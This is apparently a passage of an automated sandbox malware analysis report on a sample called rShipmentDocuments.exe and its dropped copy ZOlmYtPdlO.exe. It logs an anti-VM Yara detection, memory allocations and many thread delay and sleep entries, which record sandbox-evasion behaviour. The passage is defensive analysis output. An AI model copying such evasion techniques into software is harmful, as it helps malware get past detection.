                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: A5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: B5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeMemory allocated: 4C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 940000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 2810000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: CA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 8360000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 9360000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 9550000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: A550000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 1730000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 3060000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMemory allocated: 5060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599805Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599687Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599578Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599469Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599359Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599250Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599140Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 599024Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598468Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598126Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597669Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597533Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597387Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597275Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597154Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595953Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595843Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595734Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595625Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595297Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595187Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 595068Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599890
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599779
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599292
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599175
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 599054
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598836
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598719
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598607
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598281
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598171
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 598062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597843
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597734
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597624
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597515
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597406
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597296
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597187
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596968
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596859
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596740
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596280
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596172
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595500
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595390
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595281
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595172
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 595062
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594952
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594843
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594734
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594625
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594496
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594221
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeThread delayed: delay time: 594073
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9520Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9098Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeWindow / User API: threadDelayed 5031Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeWindow / User API: threadDelayed 4826Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeWindow / User API: threadDelayed 4456
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeWindow / User API: threadDelayed 5387
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 9520 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 50 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688Thread sleep count: 5031 > 30Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599805s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 2688Thread sleep count: 4826 > 30Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -599024s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598126s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597669s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597533s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597387s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597275s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597154s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -596062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -595068s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe TID: 1816Thread sleep time: -594406s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -35048813740048126s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384Thread sleep count: 4456 > 30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3384Thread sleep count: 5387 > 30
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599779s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599292s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599175s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -599054s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598836s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598607s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598390s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598171s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -598062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597624s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597296s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -597078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596968s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596740s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe TID: 3668Thread sleep time: -596390s >= -30000s
